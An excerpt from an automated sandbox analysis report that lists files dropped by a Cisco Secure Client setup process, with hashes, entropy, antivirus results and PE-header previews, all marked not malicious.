                                                                                                                                      Preview:{.. "downloader" : {.. "display-name" : "Cisco Secure Client - Downloader",.. "type" : "exe",.. "uri" : "binaries/vpndownloader.exe",.. "hash" : "7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3",.. "hash-type" : "sha256",.. "version" : "5.0.05040".. }..}..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RDO3H.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):21384
                                                                                                                                      Entropy (8bit):6.470094803230791
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:Y32E5mpdhYQjHy3d5Wcs5gWI3KLHRN7QiUJ/AlGstm4s:YmxQSyUyAQX/xEv
                                                                                                                                      MD5:C946A9E4170F6B16D25C822DA616DC6A
                                                                                                                                      SHA1:F602D23DB756F9C3A058D3B7186D24480E05790F
                                                                                                                                      SHA-256:65BDADB5562B9473471740B1DCD8B064459A40D71A1A11FC5AEDAA855FE7635A
                                                                                                                                      SHA-512:916CAD8B1E38B2B15AB836844C5CC9D36B212831B2F553198054FE9CB5CD77AECD544CAC8040000337CEFDA9B15BF95E8903F36A9C1BEB7D579CFFF670445617
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(D.vl%.%l%.%l%.%.U.$n%.%e]/%h%.%>P.$f%.%>P.$m%.%l%.%D%.%>P.$i%.%>P.$x%.%>P.$m%.%>PC%m%.%>P.$m%.%Richl%.%........................PE..L...J|.a.........."!.........................0...............................p......#,....@A.........................*..J....@..x....P...............0...#...`..t...X...8...............................@............@...............................text...J........................... ..`.data...8....0....... ..............@....idata.......@......."..............@..@.rsrc........P.......(..............@..@.reloc..t....`.......,..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S996S.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):119912
                                                                                                                                      Entropy (8bit):6.60185962501979
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:pykiJ1Z1K95jvS8BBw/qZqocqQThEt9WSt6MlNNp:MkiHTMBBaNEtUS9lNz
                                                                                                                                      MD5:E418E6429D29325A842E8A5F01B57236
                                                                                                                                      SHA1:D075045BC923F0AD63907CDF47AF6FE7B40DB49C
                                                                                                                                      SHA-256:EAD03108A441D27DC347649DDA3F5BBD2144B5EC35B775944761F7BBFFC95CB2
                                                                                                                                      SHA-512:92969A8394DF09973DE2F5E8A528A41EC046B5C0CCA3292CD734DF900AF1EB85A3C8643273051D1E2B27B82EC992D61559A9BB06A4B49064FECCB64EB35D2876
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....'b.........."!................@>....................................................@A........................M_......?`..(.......................hH..........D\.......................Y......`................a..<....]..`....................text............................... ..`.rdata...n.......p..................@..@.data........p.......d..............@....00cfg...............n..............@..@.tls.................p..............@....voltbl.H............r...................rsrc................t..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S9VDU.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):92776
                                                                                                                                      Entropy (8bit):6.652577402747044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JXrBoBxhQlrylel5aThWE7amOMjhO5qg9WyVPDNxsU2xS:JXri65Dl67apMjw5qg9WyB1
                                                                                                                                      MD5:448338FE18DD5BF4F6C6B87203E5ADBA
                                                                                                                                      SHA1:3095A3A7866188806898F5A366E05C53C9AF9788
                                                                                                                                      SHA-256:557F2E566FCA90B4BF853F30130EDB15EE675B76B94377ECF81792EEAA3A2690
                                                                                                                                      SHA-512:13FBEA608AEDEC472419901B6B265608070E5ADBAACFBA71091680B86A4FE0F22564AB01C6DEB283CC501BBE96F12F9196798DF263FC60C828078C66B4D18FA3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............U...U...U...U..UQ.T..U..T..U..T..U..T..U..T..U..T..U..T..U...UM..U..T..U..T...U..zU...U...U...U..T...URich...U........PE..L...O..d...........!.........~.......j.......................................`............@A.........................................0..............."..hH...@..(...P...T...............................@............................................text.............................. ..`.rdata..dS.......T..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..(....@......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-SINFC.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):126568
                                                                                                                                      Entropy (8bit):6.722288477011462
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:gGGKu/VLwQR1ky0vAF2/Fk5kIEFor6SVTdUT75VU:gGGKu/VLwYIAA++9ohVpUf5VU
                                                                                                                                      MD5:23F1917EF17DB9B94F4E4FFBE56320FB
                                                                                                                                      SHA1:964967CCBB8AEE664E8294B39E72A608C17B41A0
                                                                                                                                      SHA-256:0E48269187B4D99FC892B373EA247A48E852F71792F5F28E30001C509B8A3971
                                                                                                                                      SHA-512:ACCAC7B61E6D18662E1FF702D41052F519EE029FE4820185168B5CDF7049526DD28B43F0A84C1FFB8E2C0E1AE933D351EF9CB6AE9D410F1C312FA5DB01127120
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z............../..........................................................................Rich............PE..L.....^...........!......................... ...........................................@..........................T...D..,...........................hH...........+.......................+......0+..@............ ...............................text............................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UM1NO.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76168
                                                                                                                                      Entropy (8bit):6.765544990184352
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:zHHuqvERNjBwySXtVaSvrgOFw9RxKMn5ecbCKnIY7:zHHZMRNjKySdLcOiH5ecbCKnN
                                                                                                                                      MD5:1A84957B6E681FCA057160CD04E26B27
                                                                                                                                      SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                                                                                                                                      SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                                                                                                                                      SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...>|.a.........."!.........................................................@......{.....@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-URJD8.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1006184
                                                                                                                                      Entropy (8bit):5.97738342017222
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:9/9IZHQOBWLxPXdwWeKHI0+DPwYZC3Yeba96ga8nXNBZK/8id:9V2HQO6PqtPwJ3Yijg/dB0Ei
                                                                                                                                      MD5:744D2DC7CA442E065AC4F23C6A7B9E5F
                                                                                                                                      SHA1:0039BE9938086F925F321EC8B2FD4D008F600C1A
                                                                                                                                      SHA-256:4E9E9F15FFBFC9729F4BC561D8670214A86822D682F49A2B286BB798FD59B549
                                                                                                                                      SHA-512:918009B74EAF5CD932E7BFE1CBD65425917D8CFCDB32B6A10FF2DD44A894E06DA77544522B72F77880D1ADD9961DB0A3401CC20242976E241499F65899E76826
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.j....X...X...X...Y...X...Y...X...Y...XI..Y...XI..Y...XI..YK..X...Y...X...X...X...Y...X...X...X...X...X...Y...XRich...X........................PE..L.....d.....................F......P.............@..........................`......>.....@.................................@........P..P...............hH.......Q...w..T...................@y......Hx..@............................................text............................... ..`.rdata...!......."..................@..@.data....)... ......................@....rsrc...P....P......................@..@.reloc...Q.......R..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-V8S0O.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):359016
                                                                                                                                      Entropy (8bit):6.617093568333673
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:qSg72Vz/I7DPaCd+syv/RDdb4UP1LdmBIuITM2CswQuY5LpwUm:qSg6VzWPaXsyv5NLdfn7Rm
                                                                                                                                      MD5:44DE330562CC79CCF0D73FA8B99D369C
                                                                                                                                      SHA1:B0256E51EC29F6E42A24FA12F23086E5CAC0B8D1
                                                                                                                                      SHA-256:53C2E4F4D092C14F418D619DCADBFA0A6ED589492844C2AB2EEE504061600429
                                                                                                                                      SHA-512:CE8439B558DF0E14B1DBEFD9D34DD089F3FDDA90B9409446228B6F47C5F68A75020C8822790ABF43E75EC8598AD35354877F169E58A775EE19E17693136D8634
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=...........................................V.................Q.....9..........Rich...........PE..L......d...........!................@X.......................................p......Z<....@A.........................`..\...\a.......................2..hH......,W......T...............................@............................................text.............................. ..`.rdata..............................@..@.data....-.......*..................@....rsrc...............................@..@.reloc..,W.......X..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-VTDA9.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):449128
                                                                                                                                      Entropy (8bit):6.524987350757864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:H42omt0CD5eYwFZ6depVyQ7YAf1ZMGnz8J4N4OTW8kd6ghNu99hO5nxjOE6ARsMp:LqN4//sHTTHx4KtsutnLlEa2
                                                                                                                                      MD5:5608F2FEEEC9519ABC4C45AD6156F224
                                                                                                                                      SHA1:55B1E59342A3F0011714E146A0FFDB52CDE267DD
                                                                                                                                      SHA-256:3DEC5D47533E9DCCAF3F851DE4D37E289407CB9064CD1F32ADD08D2ABFAB75D4
                                                                                                                                      SHA-512:FF605F0F7EC45BE82696D1FAB43D74C59991AFC692C61674CA7317DF1C9953EE25D65AC94910D856EB98E6D48C280D8298C54C09BA2346B9A1959E9071ECF717
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-..~..~..~..]~...~......~......~......~......~......~......~..~...~......~......~..1~..~......~Rich..~........................PE..L.....Od...........!................p.....................................................@A.............................;..l........p..................hH.......;......T...............................@...............X............................text.............................. ..`.rdata.............................@..@.data...l....P.......6..............@....rsrc........p.......P..............@..@.reloc...;.......<...V..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):436600
                                                                                                                                      Entropy (8bit):6.647435576141042
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:/gO0BGzePo6+J+4P0xYv7IQgnhUgiW6QR7t5s03Ooc8dHkC2esKcWKe0:701Po6+J+dxYv7IQgk03Ooc8dHkC2ezc
                                                                                                                                      MD5:8FF1898897F3F4391803C7253366A87B
                                                                                                                                      SHA1:9BDBEED8F75A892B6B630EF9E634667F4C620FA0
                                                                                                                                      SHA-256:51398691FEEF7AE0A876B523AEC47C4A06D9A1EE62F1A0AEE27DE6D6191C68AD
                                                                                                                                      SHA-512:CB071AD55BEAA541B5BAF1F7D5E145F2C26FBEE53E535E8C31B8F2B8DF4BF7723F7BEF214B670B2C3DE57A4A75711DD204A940A2158939AD72F551E32DA7AB03
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...>|.a.........."!.........~...............0............................................@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):21384
                                                                                                                                      Entropy (8bit):6.470094803230791
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:Y32E5mpdhYQjHy3d5Wcs5gWI3KLHRN7QiUJ/AlGstm4s:YmxQSyUyAQX/xEv
                                                                                                                                      MD5:C946A9E4170F6B16D25C822DA616DC6A
                                                                                                                                      SHA1:F602D23DB756F9C3A058D3B7186D24480E05790F
                                                                                                                                      SHA-256:65BDADB5562B9473471740B1DCD8B064459A40D71A1A11FC5AEDAA855FE7635A
                                                                                                                                      SHA-512:916CAD8B1E38B2B15AB836844C5CC9D36B212831B2F553198054FE9CB5CD77AECD544CAC8040000337CEFDA9B15BF95E8903F36A9C1BEB7D579CFFF670445617
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(D.vl%.%l%.%l%.%.U.$n%.%e]/%h%.%>P.$f%.%>P.$m%.%l%.%D%.%>P.$i%.%>P.$x%.%>P.$m%.%>PC%m%.%>P.$m%.%Richl%.%........................PE..L...J|.a.........."!.........................0...............................p......#,....@A.........................*..J....@..x....P...............0...#...`..t...X...8...............................@............@...............................text...J........................... ..`.data...8....0....... ..............@....idata.......@......."..............@..@.rsrc........P.......(..............@..@.reloc..t....`.......,..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):166264
                                                                                                                                      Entropy (8bit):6.800892494270331
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:UZqJu0h1iCPZYtIzss2wizpHB7RoSxvQ02bnt56CY2G1zVSdqXCvjC:UZqU0hStIzrQqht567ZSY+jC
                                                                                                                                      MD5:06DEEA1786C951D3CC7E24A3E714FF03
                                                                                                                                      SHA1:9906803CEDB8600C5E201AE080155BEEBD2902B2
                                                                                                                                      SHA-256:EAC4C95CD7B013E110F2CF28C08342126FE1658EF16010541F05B234D23272DD
                                                                                                                                      SHA-512:28CAA59DEEC92E417468BB0244DA2E60FAF6482EF608258E99FA47F59D3CD0EDEE69155E913034AC7B5E1AFC88DBF8F6F97058B75F0CBC6E4C045E1EE6EAADA0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%>..a_a.a_a.a_a../`.c_a.h'.m_a.3*e.j_a.3*b.c_a.a_`.._a.3*`.d_a.3*d.r_a.3*a.`_a.3*..`_a.3*c.`_a.Richa_a.................PE..L...J|.a.........."!.....*...<......0........@......................................:.....@A.........................3..@....Q.......`...............f..x#...p..X....\..8............................\..@............P...............................text....).......*.................. ..`.data...(....@......................@....idata..`....P.......6..............@..@.rsrc........`.......D..............@..@.reloc..X....p.......H..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):267656
                                                                                                                                      Entropy (8bit):6.547035182798101
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:+9WZ4GcvxHdmJOHpxyBIBaQ0I/Quljl1mn48MHnlwgSmiSb:+VFTmJO/BH0IYuljK48ZgS0
                                                                                                                                      MD5:2FB4C4168E379F13B15D4E299ECF3429
                                                                                                                                      SHA1:4C6702254054F288BEB49ADCDD6317575E83374D
                                                                                                                                      SHA-256:8CD7BE490AD502C9980CB47C9A7162AFCCC088D9A2159D3BBBCED23A9BCBDA7F
                                                                                                                                      SHA-512:8BC80A720CDC38D58AB742D19317FBE7C36CFB0261BB9B3D5F3B366459B2801B95F8E71FB24D85B79F2C2BC43E7EB135DAB0B81953C7007A5C01494C9F584208
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hb.:...i...i...i.{.i...i^v.h...i^v.h...i^v.h...i^v.h...i.s.h...i...i...i^v.h...i^v.h...i^v.i...i^v.h...iRich...i................PE..L....~.a.........."!.........................0............................... ......Gp....@A........................@....=...............................#......TX..\J..8............................J..@............................................text...[........................... ..`.data....o...0...l..................@....idata..............................@..@.rsrc...............................@..@.reloc..TX.......Z..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76168
                                                                                                                                      Entropy (8bit):6.765544990184352
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:zHHuqvERNjBwySXtVaSvrgOFw9RxKMn5ecbCKnIY7:zHHZMRNjKySdLcOiH5ecbCKnN
                                                                                                                                      MD5:1A84957B6E681FCA057160CD04E26B27
                                                                                                                                      SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                                                                                                                                      SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                                                                                                                                      SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...>|.a.........."!.........................................................@......{.....@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1224808
                                                                                                                                      Entropy (8bit):6.594618609606493
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:lmwdP48+4TrmxqxHK1Kl7VWGPq7XbRh9F:Hm+hlB5PWRh9F
                                                                                                                                      MD5:2B773B8A1509ACDCCE63BBE24AD6020A
                                                                                                                                      SHA1:D47D47514E2B68952886FD1CBC99BF397C1A08FC
                                                                                                                                      SHA-256:2A20046DC84FC6D3D75D2E9C8AD761175739CB2E0D372CF22172C86F109620B4
                                                                                                                                      SHA-512:62C2EA22994C6CCBB2C11D044053A2DC0E687C04477DCA0DD48787FB544EF2C780A1AA31455AE47D033533E0D81B5FC1C9FF715C62BA1D51D1893322280F5B8C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......u...1...1...1...8.].!......5...c...=...c...8...c.......c...5......9...%...0...%...4...d...5...%... ...1...m...........1.0...1.Y.0......0...Rich1...........................PE..L...(..d.....................<...............@....@.................................S.....@.............................................h............h..hH..............T........................... ...@............@...............................text...J,.......................... ..`.rdata...!...@..."...2..............@..@.data...\1...p...,...T..............@....rsrc...h...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1035368
                                                                                                                                      Entropy (8bit):6.730008187623686
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:zx1d5ucCv/+XrPAQ/gL+EIK6bs6l7HNLM8RL45fvfmY3YrA0RFZa:z5iH+T/9y6I69HNLM8d45ZYrtRLa
                                                                                                                                      MD5:1987D72B9C16314FC1BDEC8315AA31B4
                                                                                                                                      SHA1:55BA31FA638F3EF505D450DAAFF5F2E6EFBB59A9
                                                                                                                                      SHA-256:CABF64B736A3217E51FE4F49DC164C2CB5218D03F05AE4B932C7D362AB5A2CFD
                                                                                                                                      SHA-512:417993511DFCACD266D459ED0B7204327D6B488F9A338C06090D81036D9B1A3D24F87E2251447F74CA655F5E234D57DF0685C45458FFDB47EB246B6E2E2E9692
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........|..|...|...|.......|.......|.......|.......|.......|..$....|.......|.......|.......|.......|...|......$....|..$....|..$...|...|...|..$....|..Rich.|..........PE..L...M..d...........!.................G....................................................@A............................\T..............................hH..............T...........................@...@............................................text...,........................... ..`.rdata..............................@..@.data....3.......0..................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1657960
                                                                                                                                      Entropy (8bit):6.613955270280212
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:NEFJgRL9dvWmJhDQLTE/SBL2M9MvGOBU+X3OKxfO3XqWjgVIOJCTR:aYRLPHhD/G2M9Mtv3OKxGBjgVIOJCTR
                                                                                                                                      MD5:EB82DFAB501EA2CE256AABDF7EFA443F
                                                                                                                                      SHA1:1656FC8BE6B149399EF99EFBDF859E2BC6657525
                                                                                                                                      SHA-256:A9627BE9ABED41D166C8AAC6E77BF33DCCB97A03D5ED80E30D389CFDD146D608
                                                                                                                                      SHA-512:F9979AF7B289635ABE58DB8D30E5594362AEAB86C34C4825ED8A10DEAE28F63F7EAD6D042B7D65A246A7A444E8E06A15D679ABE34FC313F3BCE70A621F0A154C
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......oE.+$..+$..+$.."\'.9$..MKI.)$..yQ..!$..yQ...$..yQ../$..yQ..4$...Q../$..?O../$..M..)$..~Q../$..?O..:$..+$..1!...Q..o$...Q..*$...QK.*$..+$#.*$...Q..*$..Rich+$..........................PE..L......d...........!.........................@...............................@............@A.........................|..@...@l.......P..X...............hH.......:......T...................@.......`...@............@..d............................text...z........................... ..`.orpc...J....0...................... ..`.rdata...y...@...z... ..............@..@.data...............................@....rsrc...X....P......................@..@.reloc...:.......<..................@..B........................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):359016
                                                                                                                                      Entropy (8bit):6.617093568333673
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:qSg72Vz/I7DPaCd+syv/RDdb4UP1LdmBIuITM2CswQuY5LpwUm:qSg6VzWPaXsyv5NLdfn7Rm
                                                                                                                                      MD5:44DE330562CC79CCF0D73FA8B99D369C
                                                                                                                                      SHA1:B0256E51EC29F6E42A24FA12F23086E5CAC0B8D1
                                                                                                                                      SHA-256:53C2E4F4D092C14F418D619DCADBFA0A6ED589492844C2AB2EEE504061600429
                                                                                                                                      SHA-512:CE8439B558DF0E14B1DBEFD9D34DD089F3FDDA90B9409446228B6F47C5F68A75020C8822790ABF43E75EC8598AD35354877F169E58A775EE19E17693136D8634
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=...........................................V.................Q.....9..........Rich...........PE..L......d...........!................@X.......................................p......Z<....@A.........................`..\...\a.......................2..hH......,W......T...............................@............................................text.............................. ..`.rdata..............................@..@.data....-.......*..................@....rsrc...............................@..@.reloc..,W.......X..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)

                                                                                                                                      Download File
